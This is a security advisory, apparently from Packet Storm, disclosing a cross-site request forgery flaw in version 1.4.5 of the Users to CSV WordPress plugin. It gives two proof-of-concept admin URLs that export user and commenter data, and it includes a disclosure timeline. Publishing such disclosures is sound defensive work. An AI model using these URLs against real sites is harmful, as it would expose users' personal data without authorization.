WordPress Users To CSV 1.4.5 Cross Site Request Forgery

2015-06-15T00:00:00
ID PACKETSTORM:132318
Type packetstorm
Reporter Nitin Venkatesh
Modified 2015-06-15T00:00:00

Description

                                        
                                            `# Title: Cross-Site Request Forgery Vulnerability in Users to CSV Wordpress  
Plugin v1.4.5  
# Submitter: Nitin Venkatesh  
# Product: Users to CSV Wordpress Plugin  
# Product URL: https://wordpress.org/plugins/users-to-csv/ (disabled)  
# Plugin SVN URL: https://plugins.svn.wordpress.org/users-to-csv/ (active)  
# Vulnerability Type: Cross-site Request Forgery [CWE-352]  
# Affected Versions: v1.4.5 and possibly below.  
# Tested versions: v1.4.5  
# Fixed Version: None. Support for the plugin has been deceased.  
# CVE Status: None/Unassigned/Fresh  
  
## Product Information:  
  
This plugin adds an admin screen under "Users", giving two options:  
exporting the current users to a csv file and exporting the unique  
commenters on your blog to a csv file.  
  
## Vulnerability Description:  
  
User information can be exported via a GET request to users.php via CSRF.  
  
## Proof of Concept:  
  
http://localhost/wp-admin/users.php?page=users2csv.php&csv=true&table=users  
http://localhost/wp-admin/users.php?page=users2csv.php&csv=true&table=comments  
  
## Solution:  
  
Disable the plugin. Support has been ceased.  
  
## Disclosure Timeline:  
  
2015-06-08 - Discovered. Contacted developer.  
2015-06-08 - Developer responds that support for plugin has ceased.  
2015-06-13 - Noticed plugin site has been disabled. It must’ve happened  
somewhere between 2015-06-09 and 2015-06-13. Contacted developer for  
re-confirmation.  
2015-06-14 - Developer gives go-ahead for publishing a disclosure.  
2015-06-15 - Publishing disclosure on Full Disclosure mailing list.  
  
## Disclaimer:  
  
This disclosure is purely meant for educational purposes. I will in no way  
be responsible as to how the information in this disclosure is used.  
  
  
`